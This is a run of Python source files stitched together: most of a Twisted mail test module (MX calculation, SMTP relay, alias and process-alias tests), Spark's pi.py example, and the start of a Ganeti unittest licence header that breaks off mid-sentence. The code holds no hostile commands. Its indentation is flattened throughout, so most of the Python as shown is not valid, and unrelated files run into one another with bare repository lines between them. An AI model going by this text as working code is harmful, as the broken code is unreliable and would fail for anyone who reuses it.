if name in self.addresses and type == dns.MX:
results = []
for a in self.addresses[name]:
hdr = dns.RRHeader(
name, dns.MX, dns.IN, 60, dns.Record_MX(0, a)
)
results.append(hdr)
return defer.succeed((results, [], []))
return defer.fail(failure.Failure(dns.DomainError(name)))
def setUpDNS(self):
self.auth = TestAuthority()
factory = server.DNSServerFactory([self.auth])
protocol = dns.DNSDatagramProtocol(factory)
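    # Bind a TCP port chosen by the OS, then try to bind the same port number
    # for UDP; retry with a new TCP port until both bind successfully.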
while 1:
self.port = reactor.listenTCP(0, factory, interface='127.0.0.1')
portNumber = self.port.getHost().port
try:
self.udpPort = reactor.listenUDP(portNumber, protocol, interface='127.0.0.1')
except CannotListenError:
self.port.stopListening()
else:
break
self.resolver = client.Resolver(servers=[('127.0.0.1', portNumber)])
def tearDownDNS(self):
dl = []
dl.append(defer.maybeDeferred(self.port.stopListening))
dl.append(defer.maybeDeferred(self.udpPort.stopListening))
try:
self.resolver._parseCall.cancel()
except:
pass
return defer.DeferredList(dl)
class MXTestCase(unittest.TestCase):
"""
Tests for L{mail.relaymanager.MXCalculator}.
"""
def setUp(self):
setUpDNS(self)
self.clock = task.Clock()
self.mx = mail.relaymanager.MXCalculator(self.resolver, self.clock)
def tearDown(self):
return tearDownDNS(self)
def test_defaultClock(self):
"""
L{MXCalculator}'s default clock is C{twisted.internet.reactor}.
"""
self.assertIdentical(
mail.relaymanager.MXCalculator(self.resolver).clock,
reactor)
def testSimpleSuccess(self):
self.auth.addresses['test.domain'] = ['the.email.test.domain']
return self.mx.getMX('test.domain').addCallback(self._cbSimpleSuccess)
def _cbSimpleSuccess(self, mx):
self.assertEqual(mx.preference, 0)
self.assertEqual(str(mx.name), 'the.email.test.domain')
def testSimpleFailure(self):
self.mx.fallbackToDomain = False
return self.assertFailure(self.mx.getMX('test.domain'), IOError)
def testSimpleFailureWithFallback(self):
return self.assertFailure(self.mx.getMX('test.domain'), DNSLookupError)
def _exchangeTest(self, domain, records, correctMailExchange):
"""
Issue an MX request for the given domain and arrange for it to be
responded to with the given records. Verify that the resulting mail
exchange is the indicated host.
@type domain: C{str}
@type records: C{list} of L{RRHeader}
@type correctMailExchange: C{str}
@rtype: L{Deferred}
"""
class DummyResolver(object):
def lookupMailExchange(self, name):
if name == domain:
return defer.succeed((
records,
[],
[]))
return defer.fail(DNSNameError(domain))
self.mx.resolver = DummyResolver()
d = self.mx.getMX(domain)
def gotMailExchange(record):
self.assertEqual(str(record.name), correctMailExchange)
d.addCallback(gotMailExchange)
return d
def test_mailExchangePreference(self):
"""
The MX record with the lowest preference is returned by
L{MXCalculator.getMX}.
"""
domain = "example.com"
good = "good.example.com"
bad = "bad.example.com"
records = [
RRHeader(name=domain,
type=Record_MX.TYPE,
payload=Record_MX(1, bad)),
RRHeader(name=domain,
type=Record_MX.TYPE,
payload=Record_MX(0, good)),
RRHeader(name=domain,
type=Record_MX.TYPE,
payload=Record_MX(2, bad))]
return self._exchangeTest(domain, records, good)
def test_badExchangeExcluded(self):
"""
L{MXCalculator.getMX} returns the MX record with the lowest preference
which is not also marked as bad.
"""
domain = "example.com"
good = "good.example.com"
bad = "bad.example.com"
records = [
RRHeader(name=domain,
type=Record_MX.TYPE,
payload=Record_MX(0, bad)),
RRHeader(name=domain,
type=Record_MX.TYPE,
payload=Record_MX(1, good))]
self.mx.markBad(bad)
return self._exchangeTest(domain, records, good)
def test_fallbackForAllBadExchanges(self):
"""
L{MXCalculator.getMX} returns the MX record with the lowest preference
if all the MX records in the response have been marked bad.
"""
domain = "example.com"
bad = "bad.example.com"
worse = "worse.example.com"
records = [
RRHeader(name=domain,
type=Record_MX.TYPE,
payload=Record_MX(0, bad)),
RRHeader(name=domain,
type=Record_MX.TYPE,
payload=Record_MX(1, worse))]
self.mx.markBad(bad)
self.mx.markBad(worse)
return self._exchangeTest(domain, records, bad)
def test_badExchangeExpires(self):
"""
L{MXCalculator.getMX} returns the MX record with the lowest preference
if it was last marked bad longer than L{MXCalculator.timeOutBadMX}
seconds ago.
"""
domain = "example.com"
good = "good.example.com"
previouslyBad = "bad.example.com"
records = [
RRHeader(name=domain,
type=Record_MX.TYPE,
payload=Record_MX(0, previouslyBad)),
RRHeader(name=domain,
type=Record_MX.TYPE,
payload=Record_MX(1, good))]
self.mx.markBad(previouslyBad)
self.clock.advance(self.mx.timeOutBadMX)
return self._exchangeTest(domain, records, previouslyBad)
def test_goodExchangeUsed(self):
"""
L{MXCalculator.getMX} returns the MX record with the lowest preference
if it was marked good after it was marked bad.
"""
domain = "example.com"
good = "good.example.com"
previouslyBad = "bad.example.com"
records = [
RRHeader(name=domain,
type=Record_MX.TYPE,
payload=Record_MX(0, previouslyBad)),
RRHeader(name=domain,
type=Record_MX.TYPE,
payload=Record_MX(1, good))]
self.mx.markBad(previouslyBad)
self.mx.markGood(previouslyBad)
self.clock.advance(self.mx.timeOutBadMX)
return self._exchangeTest(domain, records, previouslyBad)
def test_successWithoutResults(self):
"""
If an MX lookup succeeds but the result set is empty,
L{MXCalculator.getMX} should try to look up an I{A} record for the
requested name and call back its returned Deferred with that
address.
"""
ip = '1.2.3.4'
domain = 'example.org'
class DummyResolver(object):
"""
Fake resolver which will respond to an MX lookup with an empty
result set.
@ivar mx: A dictionary mapping hostnames to three-tuples of
results to be returned from I{MX} lookups.
@ivar a: A dictionary mapping hostnames to addresses to be
returned from I{A} lookups.
"""
mx = {domain: ([], [], [])}
a = {domain: ip}
def lookupMailExchange(self, domain):
return defer.succeed(self.mx[domain])
def getHostByName(self, domain):
return defer.succeed(self.a[domain])
self.mx.resolver = DummyResolver()
d = self.mx.getMX(domain)
d.addCallback(self.assertEqual, Record_MX(name=ip))
return d
def test_failureWithSuccessfulFallback(self):
"""
Test that if the MX record lookup fails, fallback is enabled, and an A
record is available for the name, then the Deferred returned by
L{MXCalculator.getMX} ultimately fires with a Record_MX instance which
gives the address in the A record for the name.
"""
class DummyResolver(object):
"""
Fake resolver which will fail an MX lookup but then succeed a
getHostByName call.
"""
def lookupMailExchange(self, domain):
return defer.fail(DNSNameError())
def getHostByName(self, domain):
return defer.succeed("1.2.3.4")
self.mx.resolver = DummyResolver()
d = self.mx.getMX("domain")
d.addCallback(self.assertEqual, Record_MX(name="1.2.3.4"))
return d
def test_cnameWithoutGlueRecords(self):
"""
If an MX lookup returns a single CNAME record as a result, MXCalculator
will perform an MX lookup for the canonical name indicated and return
the MX record which results.
"""
alias = "alias.example.com"
canonical = "canonical.example.com"
exchange = "mail.example.com"
class DummyResolver(object):
"""
Fake resolver which will return a CNAME for an MX lookup of a name
which is an alias and an MX for an MX lookup of the canonical name.
"""
def lookupMailExchange(self, domain):
if domain == alias:
return defer.succeed((
[RRHeader(name=domain,
type=Record_CNAME.TYPE,
payload=Record_CNAME(canonical))],
[], []))
elif domain == canonical:
return defer.succeed((
[RRHeader(name=domain,
type=Record_MX.TYPE,
payload=Record_MX(0, exchange))],
[], []))
else:
return defer.fail(DNSNameError(domain))
self.mx.resolver = DummyResolver()
d = self.mx.getMX(alias)
d.addCallback(self.assertEqual, Record_MX(name=exchange))
return d
def test_cnameChain(self):
"""
If L{MXCalculator.getMX} encounters a CNAME chain which is longer than
the length specified, the returned L{Deferred} should errback with
L{CanonicalNameChainTooLong}.
"""
class DummyResolver(object):
"""
Fake resolver which generates a CNAME chain of infinite length in
response to MX lookups.
"""
chainCounter = 0
def lookupMailExchange(self, domain):
self.chainCounter += 1
name = 'x-%d.example.com' % (self.chainCounter,)
return defer.succeed((
[RRHeader(name=domain,
type=Record_CNAME.TYPE,
payload=Record_CNAME(name))],
[], []))
cnameLimit = 3
self.mx.resolver = DummyResolver()
d = self.mx.getMX("mail.example.com", cnameLimit)
self.assertFailure(
d, twisted.mail.relaymanager.CanonicalNameChainTooLong)
def cbChainTooLong(error):
self.assertEqual(error.args[0], Record_CNAME("x-%d.example.com" % (cnameLimit + 1,)))
self.assertEqual(self.mx.resolver.chainCounter, cnameLimit + 1)
d.addCallback(cbChainTooLong)
return d
def test_cnameWithGlueRecords(self):
"""
If an MX lookup returns a CNAME and the MX record for the CNAME, the
L{Deferred} returned by L{MXCalculator.getMX} should be called back
with the name from the MX record without further lookups being
attempted.
"""
lookedUp = []
alias = "alias.example.com"
canonical = "canonical.example.com"
exchange = "mail.example.com"
class DummyResolver(object):
def lookupMailExchange(self, domain):
if domain != alias or lookedUp:
# Don't give back any results for anything except the alias
# or on any request after the first.
return ([], [], [])
return defer.succeed((
[RRHeader(name=alias,
type=Record_CNAME.TYPE,
payload=Record_CNAME(canonical)),
RRHeader(name=canonical,
type=Record_MX.TYPE,
payload=Record_MX(name=exchange))],
[], []))
self.mx.resolver = DummyResolver()
d = self.mx.getMX(alias)
d.addCallback(self.assertEqual, Record_MX(name=exchange))
return d
def test_cnameLoopWithGlueRecords(self):
"""
If an MX lookup returns two CNAME records which point to each other,
the loop should be detected and the L{Deferred} returned by
L{MXCalculator.getMX} should be errbacked with L{CanonicalNameLoop}.
"""
firstAlias = "cname1.example.com"
secondAlias = "cname2.example.com"
class DummyResolver(object):
def lookupMailExchange(self, domain):
return defer.succeed((
[RRHeader(name=firstAlias,
type=Record_CNAME.TYPE,
payload=Record_CNAME(secondAlias)),
RRHeader(name=secondAlias,
type=Record_CNAME.TYPE,
payload=Record_CNAME(firstAlias))],
[], []))
self.mx.resolver = DummyResolver()
d = self.mx.getMX(firstAlias)
self.assertFailure(d, twisted.mail.relaymanager.CanonicalNameLoop)
return d
def testManyRecords(self):
self.auth.addresses['test.domain'] = [
'mx1.test.domain', 'mx2.test.domain', 'mx3.test.domain'
]
return self.mx.getMX('test.domain'
).addCallback(self._cbManyRecordsSuccessfulLookup
)
def _cbManyRecordsSuccessfulLookup(self, mx):
self.failUnless(str(mx.name).split('.', 1)[0] in ('mx1', 'mx2', 'mx3'))
self.mx.markBad(str(mx.name))
return self.mx.getMX('test.domain'
).addCallback(self._cbManyRecordsDifferentResult, mx
)
def _cbManyRecordsDifferentResult(self, nextMX, mx):
self.assertNotEqual(str(mx.name), str(nextMX.name))
self.mx.markBad(str(nextMX.name))
return self.mx.getMX('test.domain'
).addCallback(self._cbManyRecordsLastResult, mx, nextMX
)
def _cbManyRecordsLastResult(self, lastMX, mx, nextMX):
self.assertNotEqual(str(mx.name), str(lastMX.name))
self.assertNotEqual(str(nextMX.name), str(lastMX.name))
self.mx.markBad(str(lastMX.name))
self.mx.markGood(str(nextMX.name))
return self.mx.getMX('test.domain'
).addCallback(self._cbManyRecordsRepeatSpecificResult, nextMX
)
def _cbManyRecordsRepeatSpecificResult(self, againMX, nextMX):
self.assertEqual(str(againMX.name), str(nextMX.name))
class LiveFireExercise(unittest.TestCase):
if interfaces.IReactorUDP(reactor, None) is None:
skip = "UDP support is required to determining MX records"
def setUp(self):
setUpDNS(self)
self.tmpdirs = [
'domainDir', 'insertionDomain', 'insertionQueue',
'destinationDomain', 'destinationQueue'
]
def tearDown(self):
for d in self.tmpdirs:
if os.path.exists(d):
shutil.rmtree(d)
return tearDownDNS(self)
def testLocalDelivery(self):
service = mail.mail.MailService()
service.smtpPortal.registerChecker(cred.checkers.AllowAnonymousAccess())
domain = mail.maildir.MaildirDirdbmDomain(service, 'domainDir')
domain.addUser('user', 'password')
service.addDomain('test.domain', domain)
service.portals[''] = service.portals['test.domain']
map(service.portals[''].registerChecker, domain.getCredentialsCheckers())
service.setQueue(mail.relay.DomainQueuer(service))
manager = mail.relaymanager.SmartHostSMTPRelayingManager(service.queue, None)
helper = mail.relaymanager.RelayStateHelper(manager, 1)
f = service.getSMTPFactory()
self.smtpServer = reactor.listenTCP(0, f, interface='127.0.0.1')
client = LineSendingProtocol([
'HELO meson',
'MAIL FROM: <user@hostname>',
'RCPT TO: <[email protected]>',
'DATA',
'This is the message',
'.',
'QUIT'
])
done = Deferred()
f = protocol.ClientFactory()
f.protocol = lambda: client
f.clientConnectionLost = lambda *args: done.callback(None)
reactor.connectTCP('127.0.0.1', self.smtpServer.getHost().port, f)
def finished(ign):
mbox = domain.requestAvatar('user', None, pop3.IMailbox)[1]
msg = mbox.getMessage(0).read()
self.failIfEqual(msg.find('This is the message'), -1)
return self.smtpServer.stopListening()
done.addCallback(finished)
return done
def testRelayDelivery(self):
# Here is the service we will connect to and send mail from
insServ = mail.mail.MailService()
insServ.smtpPortal.registerChecker(cred.checkers.AllowAnonymousAccess())
domain = mail.maildir.MaildirDirdbmDomain(insServ, 'insertionDomain')
insServ.addDomain('insertion.domain', domain)
os.mkdir('insertionQueue')
insServ.setQueue(mail.relaymanager.Queue('insertionQueue'))
insServ.domains.setDefaultDomain(mail.relay.DomainQueuer(insServ))
manager = mail.relaymanager.SmartHostSMTPRelayingManager(insServ.queue)
manager.fArgs += ('test.identity.hostname',)
helper = mail.relaymanager.RelayStateHelper(manager, 1)
# Yoink! Now the internet obeys OUR every whim!
manager.mxcalc = mail.relaymanager.MXCalculator(self.resolver)
# And this is our whim.
self.auth.addresses['destination.domain'] = ['127.0.0.1']
f = insServ.getSMTPFactory()
self.insServer = reactor.listenTCP(0, f, interface='127.0.0.1')
# Here is the service the previous one will connect to for final
# delivery
destServ = mail.mail.MailService()
destServ.smtpPortal.registerChecker(cred.checkers.AllowAnonymousAccess())
domain = mail.maildir.MaildirDirdbmDomain(destServ, 'destinationDomain')
domain.addUser('user', 'password')
destServ.addDomain('destination.domain', domain)
os.mkdir('destinationQueue')
destServ.setQueue(mail.relaymanager.Queue('destinationQueue'))
manager2 = mail.relaymanager.SmartHostSMTPRelayingManager(destServ.queue)
helper = mail.relaymanager.RelayStateHelper(manager, 1)
helper.startService()
f = destServ.getSMTPFactory()
self.destServer = reactor.listenTCP(0, f, interface='127.0.0.1')
# Update the port number the *first* relay will connect to, because we can't use
# port 25
manager.PORT = self.destServer.getHost().port
client = LineSendingProtocol([
'HELO meson',
'MAIL FROM: <user@wherever>',
'RCPT TO: <[email protected]>',
'DATA',
'This is the message',
'.',
'QUIT'
])
done = Deferred()
f = protocol.ClientFactory()
f.protocol = lambda: client
f.clientConnectionLost = lambda *args: done.callback(None)
reactor.connectTCP('127.0.0.1', self.insServer.getHost().port, f)
def finished(ign):
# First part of the delivery is done. Poke the queue manually now
# so we don't have to wait for the queue to be flushed.
delivery = manager.checkState()
def delivered(ign):
mbox = domain.requestAvatar('user', None, pop3.IMailbox)[1]
msg = mbox.getMessage(0).read()
self.failIfEqual(msg.find('This is the message'), -1)
self.insServer.stopListening()
self.destServer.stopListening()
helper.stopService()
delivery.addCallback(delivered)
return delivery
done.addCallback(finished)
return done
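# /etc/aliases-style fixture for the alias tests below: comments, plain
# addresses, a continuation line, an include (:/path) and a process (|/path)
# target.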
aliasFile = StringIO.StringIO("""\
# Here's a comment
# woop another one
testuser: address1,address2, address3,
continuation@address, |/bin/process/this
usertwo:thisaddress,thataddress, lastaddress
lastuser: :/includable, /filename, |/program, address
""")
class LineBufferMessage:
def __init__(self):
self.lines = []
self.eom = False
self.lost = False
def lineReceived(self, line):
self.lines.append(line)
def eomReceived(self):
self.eom = True
return defer.succeed('<Whatever>')
def connectionLost(self):
self.lost = True
class AliasTestCase(unittest.TestCase):
lines = [
'First line',
'Next line',
'',
'After a blank line',
'Last line'
]
def setUp(self):
aliasFile.seek(0)
def testHandle(self):
result = {}
lines = [
'user: another@host\n',
'nextuser: |/bin/program\n',
'user: me@again\n',
'moreusers: :/etc/include/filename\n',
'multiuser: first@host, second@host,last@anotherhost',
]
for l in lines:
mail.alias.handle(result, l, 'TestCase', None)
self.assertEqual(result['user'], ['another@host', 'me@again'])
self.assertEqual(result['nextuser'], ['|/bin/program'])
self.assertEqual(result['moreusers'], [':/etc/include/filename'])
self.assertEqual(result['multiuser'], ['first@host', 'second@host', 'last@anotherhost'])
def testFileLoader(self):
domains = {'': object()}
result = mail.alias.loadAliasFile(domains, fp=aliasFile)
self.assertEqual(len(result), 3)
group = result['testuser']
s = str(group)
for a in ('address1', 'address2', 'address3', 'continuation@address', '/bin/process/this'):
self.failIfEqual(s.find(a), -1)
self.assertEqual(len(group), 5)
group = result['usertwo']
s = str(group)
for a in ('thisaddress', 'thataddress', 'lastaddress'):
self.failIfEqual(s.find(a), -1)
self.assertEqual(len(group), 3)
group = result['lastuser']
s = str(group)
self.assertEqual(s.find('/includable'), -1)
for a in ('/filename', 'program', 'address'):
self.failIfEqual(s.find(a), -1, '%s not found' % a)
self.assertEqual(len(group), 3)
def testMultiWrapper(self):
msgs = LineBufferMessage(), LineBufferMessage(), LineBufferMessage()
msg = mail.alias.MultiWrapper(msgs)
for L in self.lines:
msg.lineReceived(L)
return msg.eomReceived().addCallback(self._cbMultiWrapper, msgs)
def _cbMultiWrapper(self, ignored, msgs):
for m in msgs:
self.failUnless(m.eom)
self.failIf(m.lost)
self.assertEqual(self.lines, m.lines)
def testFileAlias(self):
tmpfile = self.mktemp()
a = mail.alias.FileAlias(tmpfile, None, None)
m = a.createMessageReceiver()
for l in self.lines:
m.lineReceived(l)
return m.eomReceived().addCallback(self._cbTestFileAlias, tmpfile)
def _cbTestFileAlias(self, ignored, tmpfile):
lines = file(tmpfile).readlines()
self.assertEqual([L[:-1] for L in lines], self.lines)
class DummyDomain(object):
"""
Test domain for L{AddressAliasTests}.
"""
def __init__(self, address):
self.address = address
def exists(self, user, memo=None):
"""
        @returns: When a C{memo} is passed in this will raise a
            L{smtp.SMTPBadRcpt} exception, otherwise a callable which
            reports whether the C{user} and the string version of
            L{self.address} are equal.
        @rtype: C{callable}
"""
if memo:
raise mail.smtp.SMTPBadRcpt('ham')
return lambda: user == str(self.address)
class AddressAliasTests(unittest.TestCase):
"""
Tests for L{twisted.mail.alias.AddressAlias}.
"""
def setUp(self):
"""
        Set up an L{AddressAlias}.
"""
self.address = mail.smtp.Address('foo@bar')
domains = {self.address.domain: DummyDomain(self.address)}
self.alias = mail.alias.AddressAlias(self.address, domains,
self.address)
def test_createMessageReceiver(self):
"""
        L{createMessageReceiver} calls C{exists()} on the domain object
        whose key matches the C{alias} passed to L{AddressAlias}.
"""
self.assertTrue(self.alias.createMessageReceiver())
def test_str(self):
"""
        The string representation of L{AddressAlias} includes the alias.
"""
self.assertEqual(str(self.alias), '<Address foo@bar>')
def test_resolve(self):
"""
        L{resolve} looks for additional aliases when a C{aliasmap}
        dictionary is passed, and returns C{None} if none were found.
"""
self.assertEqual(self.alias.resolve({self.address: 'bar'}), None)
def test_resolveWithoutAliasmap(self):
"""
L{resolve} returns C{None} when the alias could not be found in the
C{aliasmap} and no L{mail.smtp.User} with this alias exists either.
"""
self.assertEqual(self.alias.resolve({}), None)
class DummyProcess(object):
__slots__ = ['onEnd']
class MockProcessAlias(mail.alias.ProcessAlias):
"""
    An alias processor that doesn't actually launch processes.
"""
def spawnProcess(self, proto, program, path):
"""
Don't spawn a process.
"""
class MockAliasGroup(mail.alias.AliasGroup):
"""
An alias group using C{MockProcessAlias}.
"""
processAliasFactory = MockProcessAlias
class StubProcess(object):
"""
Fake implementation of L{IProcessTransport}.
@ivar signals: A list of all the signals which have been sent to this fake
process.
"""
def __init__(self):
self.signals = []
def loseConnection(self):
"""
No-op implementation of disconnection.
"""
def signalProcess(self, signal):
"""
Record a signal sent to this process for later inspection.
"""
self.signals.append(signal)
class ProcessAliasTestCase(unittest.TestCase):
"""
Tests for alias resolution.
"""
if interfaces.IReactorProcess(reactor, None) is None:
skip = "IReactorProcess not supported"
lines = [
'First line',
'Next line',
'',
'After a blank line',
'Last line'
]
def exitStatus(self, code):
"""
Construct a status from the given exit code.
@type code: L{int} between 0 and 255 inclusive.
@param code: The exit status which the code will represent.
@rtype: L{int}
@return: A status integer for the given exit code.
"""
# /* Macros for constructing status values. */
# #define __W_EXITCODE(ret, sig) ((ret) << 8 | (sig))
status = (code << 8) | 0
# Sanity check
self.assertTrue(os.WIFEXITED(status))
self.assertEqual(os.WEXITSTATUS(status), code)
self.assertFalse(os.WIFSIGNALED(status))
return status
def signalStatus(self, signal):
"""
Construct a status from the given signal.
@type signal: L{int} between 0 and 255 inclusive.
@param signal: The signal number which the status will represent.
@rtype: L{int}
@return: A status integer for the given signal.
"""
# /* If WIFSIGNALED(STATUS), the terminating signal. */
# #define __WTERMSIG(status) ((status) & 0x7f)
# /* Nonzero if STATUS indicates termination by a signal. */
# #define __WIFSIGNALED(status) \
# (((signed char) (((status) & 0x7f) + 1) >> 1) > 0)
status = signal
# Sanity check
self.assertTrue(os.WIFSIGNALED(status))
self.assertEqual(os.WTERMSIG(status), signal)
self.assertFalse(os.WIFEXITED(status))
return status
def setUp(self):
"""
Replace L{smtp.DNSNAME} with a well-known value.
"""
self.DNSNAME = smtp.DNSNAME
smtp.DNSNAME = ''
def tearDown(self):
"""
Restore the original value of L{smtp.DNSNAME}.
"""
smtp.DNSNAME = self.DNSNAME
def test_processAlias(self):
"""
Standard call to C{mail.alias.ProcessAlias}: check that the specified
script is called, and that the input is correctly transferred to it.
"""
sh = FilePath(self.mktemp())
sh.setContent("""\
#!/bin/sh
rm -f process.alias.out
while read i; do
echo $i >> process.alias.out
done""")
os.chmod(sh.path, 0700)
a = mail.alias.ProcessAlias(sh.path, None, None)
m = a.createMessageReceiver()
for l in self.lines:
m.lineReceived(l)
def _cbProcessAlias(ignored):
lines = file('process.alias.out').readlines()
self.assertEqual([L[:-1] for L in lines], self.lines)
return m.eomReceived().addCallback(_cbProcessAlias)
def test_processAliasTimeout(self):
"""
If the alias child process does not exit within a particular period of
time, the L{Deferred} returned by L{MessageWrapper.eomReceived} should
fail with L{ProcessAliasTimeout} and send the I{KILL} signal to the
        child process.
"""
reactor = task.Clock()
transport = StubProcess()
proto = mail.alias.ProcessAliasProtocol()
proto.makeConnection(transport)
receiver = mail.alias.MessageWrapper(proto, None, reactor)
d = receiver.eomReceived()
reactor.advance(receiver.completionTimeout)
def timedOut(ignored):
self.assertEqual(transport.signals, ['KILL'])
# Now that it has been killed, disconnect the protocol associated
# with it.
proto.processEnded(
ProcessTerminated(self.signalStatus(signal.SIGKILL)))
self.assertFailure(d, mail.alias.ProcessAliasTimeout)
d.addCallback(timedOut)
return d
def test_earlyProcessTermination(self):
"""
If the process associated with an L{mail.alias.MessageWrapper} exits
before I{eomReceived} is called, the L{Deferred} returned by
I{eomReceived} should fail.
"""
transport = StubProcess()
protocol = mail.alias.ProcessAliasProtocol()
protocol.makeConnection(transport)
receiver = mail.alias.MessageWrapper(protocol, None, None)
protocol.processEnded(failure.Failure(ProcessDone(0)))
return self.assertFailure(receiver.eomReceived(), ProcessDone)
def _terminationTest(self, status):
"""
Verify that if the process associated with an
L{mail.alias.MessageWrapper} exits with the given status, the
L{Deferred} returned by I{eomReceived} fails with L{ProcessTerminated}.
"""
transport = StubProcess()
protocol = mail.alias.ProcessAliasProtocol()
protocol.makeConnection(transport)
receiver = mail.alias.MessageWrapper(protocol, None, None)
protocol.processEnded(
failure.Failure(ProcessTerminated(status)))
return self.assertFailure(receiver.eomReceived(), ProcessTerminated)
def test_errorProcessTermination(self):
"""
If the process associated with an L{mail.alias.MessageWrapper} exits
with a non-zero exit code, the L{Deferred} returned by I{eomReceived}
should fail.
"""
return self._terminationTest(self.exitStatus(1))
def test_signalProcessTermination(self):
"""
If the process associated with an L{mail.alias.MessageWrapper} exits
because it received a signal, the L{Deferred} returned by
I{eomReceived} should fail.
"""
return self._terminationTest(self.signalStatus(signal.SIGHUP))
def test_aliasResolution(self):
"""
        Check that the C{resolve} method of alias processors produces the
        correct set of objects:
        - direct aliases with L{mail.alias.AddressAlias} if a simple input is
          passed
        - aliases in a file with L{mail.alias.FileWrapper} if an input in the
          format '/file' is given
        - aliases resulting from a process call wrapped by
          L{mail.alias.MessageWrapper} if the format is '|process'
"""
aliases = {}
domain = {'': TestDomain(aliases, ['user1', 'user2', 'user3'])}
A1 = MockAliasGroup(['user1', '|echo', '/file'], domain, 'alias1')
A2 = MockAliasGroup(['user2', 'user3'], domain, 'alias2')
A3 = mail.alias.AddressAlias('alias1', domain, 'alias3')
aliases.update({
'alias1': A1,
'alias2': A2,
'alias3': A3,
})
res1 = A1.resolve(aliases)
r1 = map(str, res1.objs)
r1.sort()
expected = map(str, [
mail.alias.AddressAlias('user1', None, None),
mail.alias.MessageWrapper(DummyProcess(), 'echo'),
mail.alias.FileWrapper('/file'),
])
expected.sort()
self.assertEqual(r1, expected)
res2 = A2.resolve(aliases)
r2 = map(str, res2.objs)
r2.sort()
expected = map(str, [
mail.alias.AddressAlias('user2', None, None),
mail.alias.AddressAlias('user3', None, None)
])
expected.sort()
self.assertEqual(r2, expected)
res3 = A3.resolve(aliases)
r3 = map(str, res3.objs)
r3.sort()
expected = map(str, [
mail.alias.AddressAlias('user1', None, None),
mail.alias.MessageWrapper(DummyProcess(), 'echo'),
mail.alias.FileWrapper('/file'),
])
expected.sort()
self.assertEqual(r3, expected)
def test_cyclicAlias(self):
"""
Check that a cycle in alias resolution is correctly handled.
"""
aliases = {}
domain = {'': TestDomain(aliases, [])}
A1 = mail.alias.AddressAlias('alias2', domain, 'alias1')
A2 = mail.alias.AddressAlias('alias3', domain, 'alias2')
A3 = mail.alias.AddressAlias('alias1', domain, 'alias3')
aliases.update({
'alias1': A1,
'alias2': A2,
'alias3': A3
})
self.assertEqual(aliases['alias1'].resolve(aliases), None)
self.assertEqual(aliases['alias2'].resolve(aliases), None)
self.assertEqual(aliases['alias3'].resolve(aliases), None)
A4 = MockAliasGroup(['|echo', 'alias1'], domain, 'alias4')
aliases['alias4'] = A4
res = A4.resolve(aliases)
r = map(str, res.objs)
r.sort()
expected = map(str, [
mail.alias.MessageWrapper(DummyProcess(), 'echo')
])
expected.sort()
self.assertEqual(r, expected)
class TestDomain:
def __init__(self, aliases, users):
self.aliases = aliases
self.users = users
def exists(self, user, memo=None):
user = user.dest.local
if user in self.users:
return lambda: mail.alias.AddressAlias(user, None, None)
try:
a = self.aliases[user]
except:
raise smtp.SMTPBadRcpt(user)
else:
aliases = a.resolve(self.aliases, memo)
if aliases:
return lambda: aliases
raise smtp.SMTPBadRcpt(user)
class SSLContextFactoryTests(unittest.TestCase):
"""
Tests for twisted.mail.protocols.SSLContextFactory.
"""
def test_deprecation(self):
"""
Accessing L{twisted.mail.protocols.SSLContextFactory} emits a
deprecation warning recommending the use of the more general SSL context
factory from L{twisted.internet.ssl}.
"""
mail.protocols.SSLContextFactory
warningsShown = self.flushWarnings([self.test_deprecation])
self.assertEqual(len(warningsShown), 1)
self.assertIdentical(warningsShown[0]['category'], DeprecationWarning)
self.assertEqual(
warningsShown[0]['message'],
'twisted.mail.protocols.SSLContextFactory was deprecated in '
'Twisted 12.2.0: Use twisted.internet.ssl.'
'DefaultOpenSSLContextFactory instead.')
from twisted.python.runtime import platformType
import types
if platformType != "posix":
for o in locals().values():
if isinstance(o, (types.ClassType, type)) and issubclass(o, unittest.TestCase):
o.skip = "twisted.mail only works on posix"
|
maropu/spark
|
refs/heads/master
|
examples/src/main/python/pi.py
|
27
|
#
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import sys
from random import random
from operator import add
from pyspark.sql import SparkSession
if __name__ == "__main__":
"""
Usage: pi [partitions]
"""
spark = SparkSession\
.builder\
.appName("PythonPi")\
.getOrCreate()
partitions = int(sys.argv[1]) if len(sys.argv) > 1 else 2
n = 100000 * partitions
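    # Monte Carlo estimate: sample points uniformly in [-1, 1] x [-1, 1] and
    # count those inside the unit circle; pi is roughly 4 * count / n.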
def f(_):
x = random() * 2 - 1
y = random() * 2 - 1
return 1 if x ** 2 + y ** 2 <= 1 else 0
count = spark.sparkContext.parallelize(range(1, n + 1), partitions).map(f).reduce(add)
print("Pi is roughly %f" % (4.0 * count / n))
spark.stop()
|
bitemyapp/ganeti
|
refs/heads/master
|
test/py/ganeti.runtime_unittest.py
|
9
|
#!/usr/bin/python
#
# Copyright (C) 2010 Google Inc.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# 1. Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
#
# 2. Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS
# IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED
# TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR
# CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
# EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
# PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
# LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
# NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
